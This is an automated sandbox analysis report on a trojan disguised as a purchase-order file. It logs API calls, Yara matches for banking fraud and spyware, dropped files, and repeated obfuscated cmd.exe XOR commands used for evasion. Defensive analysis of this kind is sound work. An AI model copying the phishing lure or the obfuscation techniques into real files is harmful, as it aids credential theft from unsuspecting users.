              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0041183A OpenClipboard,GetLastError,DeleteFileW,137_2_0041183A
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,137_2_0040987A
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,137_2_004098E2
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,138_2_00406DFC
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,138_2_00406E9F
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalFix,ReadFile,GlobalUnWire,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,139_2_004068B5
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalFix,memcpy,GlobalUnWire,SetClipboardData,CloseClipboard,139_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000087.00000003.59076000939.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000087.00000003.59075843834.0000000005DF7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe PID: 7048, type: MEMORYSTR
              Source: Yara matchFile source: C:\Users\user\AppData\Roaming\kajsoiestc.dat, type: DROPPED
              Source: Conhost.exeProcess created: 102

              System Summary

              barindex
              Source: initial sampleStatic PE information: Filename: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,137_2_0040DD85
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00401806 NtdllDefWindowProc_W,137_2_00401806
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_004018C0 NtdllDefWindowProc_W,137_2_004018C0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004016FD NtdllDefWindowProc_A,138_2_004016FD
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004017B7 NtdllDefWindowProc_A,138_2_004017B7
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00402CAC NtdllDefWindowProc_A,139_2_00402CAC
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00402D66 NtdllDefWindowProc_A,139_2_00402D66
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 5_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,5_2_004030EF
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Windows\resources\0409\gashanens.iniJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00406E8F137_2_00406E8F
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044B040137_2_0044B040
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0043610D137_2_0043610D
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00447310137_2_00447310
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044A490137_2_0044A490
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040755A137_2_0040755A
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0043C560137_2_0043C560
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044B610137_2_0044B610
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044D6C0137_2_0044D6C0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_004476F0137_2_004476F0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044B870137_2_0044B870
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044081D137_2_0044081D
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00414957137_2_00414957
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_004079EE137_2_004079EE
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00407AEB137_2_00407AEB
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044AA80137_2_0044AA80
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00412AA9137_2_00412AA9
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00404B74137_2_00404B74
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00404B03137_2_00404B03
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0044BBD8137_2_0044BBD8
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00404BE5137_2_00404BE5
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00404C76137_2_00404C76
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00415CFE137_2_00415CFE
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00416D72137_2_00416D72
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00446D30137_2_00446D30
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00446D8B137_2_00446D8B
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00405038138_2_00405038
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0041208C138_2_0041208C
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004050A9138_2_004050A9
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0040511A138_2_0040511A
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0043C13A138_2_0043C13A
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004051AB138_2_004051AB
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00449300138_2_00449300
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0040D322138_2_0040D322
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0044A4F0138_2_0044A4F0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0043A5AB138_2_0043A5AB
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00413631138_2_00413631
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00446690138_2_00446690
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0044A730138_2_0044A730
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004398D8138_2_004398D8
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_004498E0138_2_004498E0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0044A886138_2_0044A886
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0043DA09138_2_0043DA09
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00438D5E138_2_00438D5E
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00449ED0138_2_00449ED0
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_0041FE83138_2_0041FE83
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 138_2_00430F54138_2_00430F54
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004050C2139_2_004050C2
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004014AB139_2_004014AB
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00405133139_2_00405133
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004051A4139_2_004051A4
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00401246139_2_00401246
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_0040CA46139_2_0040CA46
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00405235139_2_00405235
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004032C8139_2_004032C8
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_004222D9139_2_004222D9
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00401689139_2_00401689
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00402F60139_2_00402F60
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: String function: 00416760 appears 69 times
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeStatic PE information: invalid certificate
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
              Source: Gutte.exe.135.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.56268346659.0000000005E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000087.00000003.56268961543.0000000005E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: OriginalFileName vs PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeBinary or memory string: OriginalFilename vs PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008B.00000002.56238940466.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@395/17@10/3
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,137_2_004182CE
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 139_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,FindCloseChangeNotification,139_2_00410DE1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,137_2_00418758
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,137_2_00413D4C
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeCode function: 137_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,137_2_0040B58D
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Users\user\udskriftskartotekJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeMutant created: \Sessions\1\BaseNamedObjects\aksoiestgb-7MC3AW
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile created: C:\Users\user\AppData\Local\Temp\nsoBC26.tmpJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\rrrsyhb.vbs"
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeSystem information queried: HandleInformation
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 0000008A.00000002.56237187879.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe, 00000089.00000002.56267328410.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeVirustotal: Detection: 19%
              Source: PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeReversingLabs: Detection: 13%
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeFile read: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeJump to behavior
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_138-33211
              Source: unknownProcess created: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe "C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
